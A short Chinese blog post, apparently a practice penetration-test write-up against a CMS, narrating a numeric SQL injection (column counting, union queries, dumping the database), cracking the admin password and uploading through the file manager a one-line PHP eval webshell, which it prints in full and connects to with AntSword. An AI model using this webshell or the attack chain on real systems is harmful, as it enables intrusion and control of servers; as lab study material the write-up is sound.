安全 记一次cms的web渗透测试练习 2024 年 9 月 28 日 / 点击文章发现尝试进行sql注入得到漏洞为数字型通过order by语句得到字段总数为15通过union联合查询得到显示的字段编号将database()带入得到数据库名为cms接下来就是查表名、字段名、具体数据发现密码经过加密,尝试解密通过解密得知admin账户的密码为123456登陆后台文件管理界面存在文件上传漏洞,尝试上传webshell 1<?php @eval($_POST[777])?> 未做任何防护,上传成功!用蚁剑连接webshell连接成功! Post Views: 161
